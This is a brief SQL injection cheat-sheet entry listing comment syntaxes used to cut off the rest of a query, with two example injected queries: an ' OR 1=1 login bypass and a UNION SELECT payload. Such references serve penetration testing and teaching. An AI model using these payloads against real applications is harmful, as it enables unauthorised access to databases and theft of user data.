The following methods can be used to comment out the rest of a query after your injection:
| Comment Syntax | Description |
|---|---|
# | Hash comment |
/* | C-style comment |
-- - | SQL comment |
;%00 | Nullbyte |
` | Backtick |
Examples
SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';
Notes
- The backtick can only be used to end a query when used as an alias